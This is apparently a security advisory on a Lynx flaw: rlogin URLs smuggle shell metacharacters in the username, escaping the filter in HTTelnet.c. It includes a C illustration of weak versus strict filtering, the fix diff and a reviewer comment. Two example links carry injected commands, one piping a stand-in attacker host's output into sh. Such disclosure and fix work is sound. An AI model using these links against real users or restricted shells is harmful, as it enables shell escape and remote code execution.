COMMAND
lynx
SYSTEMS AFFECTED
Systems running lynx
PROBLEM
Artur Grabowski found the following. Lynx has a feature that can be
abused to run trojan commands. For users on systems where lynx is the
login shell, or is otherwise the only program they are allowed to run,
the user can obtain a shell simply by "clicking" a link that looks
like this:
<a href="rlogin://foo;sh@foo">foo</a>.
Running hostile code is also easy with this feature:
<a href="rlogin://eviluser|sh@evilhost.foo">foo</a>.
The login shell (or something similar) for eviluser@evilhost.foo
prints out a few commands to run on the victim. The problem is in
WWW/Library/Implementation/HTTelnet.c in the function
remote_session. It strips the "bad" characters ('|', ';') from
everything except the username:
/*
* Modified to allow for odd chars in a username only if exists.
* 05-28-94 Lynx 2-3-1 Garrett Arch Blythe
*/
That was a bad decision.
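The following is an added illustration, not code from Lynx's HTTelnet.c: the same character filter written two ways, one that begins scanning at the '@' (so the username is never inspected) and one that scans the whole string. The allowed character set is the one visible in the advisory's diff; the two sample host strings are the ones from the links above. The function target_is_acceptable is an assumed alternative policy (refuse the whole target instead of silently truncating it) and is not part of the Lynx fix.

```c
/* Constructed illustration (not Lynx's HTTelnet.c) of the remote_session
 * character filter before and after the fix described in the advisory. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Allowed set taken from the advisory's diff: alphanumerics plus
 * '_', '-', ':', '.', '@'. */
static int allowed_char(unsigned char c)
{
    return isalnum(c) || c == '_' || c == '-' || c == ':' || c == '.' || c == '@';
}

/* Truncate at the first disallowed character, starting the scan at `start`. */
static void truncate_at_unsafe(char *start)
{
    char *cp;
    for (cp = start; *cp != '\0'; cp++) {
        if (!allowed_char((unsigned char)*cp)) {
            *cp = '\0';          /* drop everything from here on */
            return;
        }
    }
}

/* Weak filter: when an '@' is present the scan starts there, so the
 * username in front of it is never checked. */
void filter_skip_username(char *host)
{
    char *at = strchr(host, '@');
    truncate_at_unsafe(at ? at : host);
}

/* Strict filter: scan the whole string, username included. */
void filter_whole_string(char *host)
{
    truncate_at_unsafe(host);
}

/* 1 if a shell metacharacter the filter was meant to remove is still present. */
int has_shell_meta(const char *s)
{
    return strpbrk(s, ";|<>`\"' \t\r\n") != NULL;
}

/* Assumed alternative policy: reject the whole target if any character is
 * outside the allowed set, rather than silently truncating it. */
int target_is_acceptable(const char *s)
{
    for (; *s != '\0'; s++)
        if (!allowed_char((unsigned char)*s))
            return 0;
    return 1;
}

int main(void)
{
    /* Constructed inputs: the host strings from the advisory's two links
     * plus one benign target. */
    const char *samples[] = { "foo;sh@foo", "eviluser|sh@evilhost.foo",
                              "user@host.example" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char weak[64], strict[64];
        snprintf(weak, sizeof weak, "%s", samples[i]);
        snprintf(strict, sizeof strict, "%s", samples[i]);
        filter_skip_username(weak);
        filter_whole_string(strict);
        printf("%-26s  weak -> %-26s meta=%d  strict -> %-10s accept=%d\n",
               samples[i], weak, has_shell_meta(weak), strict,
               target_is_acceptable(samples[i]));
    }
    return 0;
}
```

Run as is: the weak filter leaves both hostile targets intact (has_shell_meta reports 1), the strict filter cuts them down to "foo" and "eviluser", and target_is_acceptable refuses both while accepting the benign target.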
SOLUTION
The obvious fix is to be more paranoid than "user friendly".
(The diff was made against the OpenBSD CVS repository, so the line
numbers may not match other copies of the source.)
Index: HTTelnet.c
===================================================================
RCS file: /cvs/src/gnu/usr.bin/lynx/WWW/Library/Implementation/HTTelnet.c,v
retrieving revision 1.1.1.1
diff -u -w -u -r1.1.1.1 HTTelnet.c
--- HTTelnet.c 1998/03/11 17:47:47 1.1.1.1
+++ HTTelnet.c 1998/11/16 17:01:35
@@ -73,8 +73,7 @@
* *cp=0; / * terminate at any ;,<,>,`,|,",' or space or return
* or tab to prevent security whole
*/
- for(cp = (strchr(host, '@') ? strchr(host, '@') : host); *cp != '\0';
- cp++) {
+ for(cp = host; *cp != '\0'; cp++) {
if(!isalnum(*cp) && *cp != '_' && *cp != '-' &&
*cp != ':' && *cp != '.' && *cp != '@') {
*cp = '\0';
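Review bot: Truncating at the first rejected character (`*cp = '\0';`) silently turns a hostile target such as `eviluser|sh@evilhost.foo` into `eviluser` and carries on with the rlogin; it would be safer, and clearer to the user, to reject the whole URL with an error when any disallowed character is found. Two smaller points while here: `isalnum(*cp)` should be `isalnum((unsigned char)*cp)`, since passing a negative `char` value is undefined behaviour, and the comment above the loop could be corrected from "security whole" to "security hole".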